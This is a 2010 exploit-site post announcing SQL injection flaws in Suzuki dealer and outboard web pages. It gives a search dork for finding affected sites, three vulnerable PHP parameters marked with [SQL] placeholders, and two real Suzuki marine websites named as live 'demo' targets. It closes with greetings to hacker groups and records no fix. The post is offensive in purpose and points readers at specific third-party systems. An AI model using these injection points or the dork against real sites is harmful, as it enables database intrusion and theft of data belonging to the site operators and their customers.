Suzuki SQL Injection Vulnerability

2010-06-22 20:49:03
Posted by: Net.Edit0r


# Title : Suzuki SQL Injection Vulnerability
# Author : Net.Edit0r
# Data : 2010-06-21
# Location : Iran
# Dork : "© Suzuki GB & Suzuki Motor Corporation 2010."
# Category : webapps

[~]######################################### InformatioN #############################################[~]

[~] Title : Suzuki SQL Injection Vulnerability
[~] Author : Net.Edit0r
[~] Email : [email protected] ~ [email protected]

[~]######################################### ExploiT #############################################[~]

[~] 1. Vulnerable File :
# Version: [app version]

http://127.0.0.1/outboards/detail.php?ref=[SQL]

[~] 2. Vulnerable File :

http://127.0.0.1/detail.php?id=[SQL]

[~] 3. Vulnerable File :

http://127.0.0.1/dealers/detail.php?id=[SQL]

[~] 3. Demo :

http://www.suzukimarine.ie/outboards/detail.php?ref=[SQL]

http://www.suzuki-marine.co.uk/news/detail.php?id=[SQL]


[~]######################################### ThankS To ... ############################################[~]

[~] Special Thanks To My Best FriendS :

NetQard , B3hz4d , Raiden , ~[ CriMe ]~ , † CoNstaNtine † , _R3v4l_ , ~~XTerror~~ , __l2o5v4__ , _Attack_

[~] IRANIAN Young HackerZ

[~] GreetZ : Sun-Army.Org , Phc.Ir , Dark-tunnel.com , AttackerZ.IR

[~]######################################### FinisH :D #############################################[~]


# Inj3ct0r.com [2010-06-22]

Fixes

No fixes

In order to submit a new fix you need to be registered.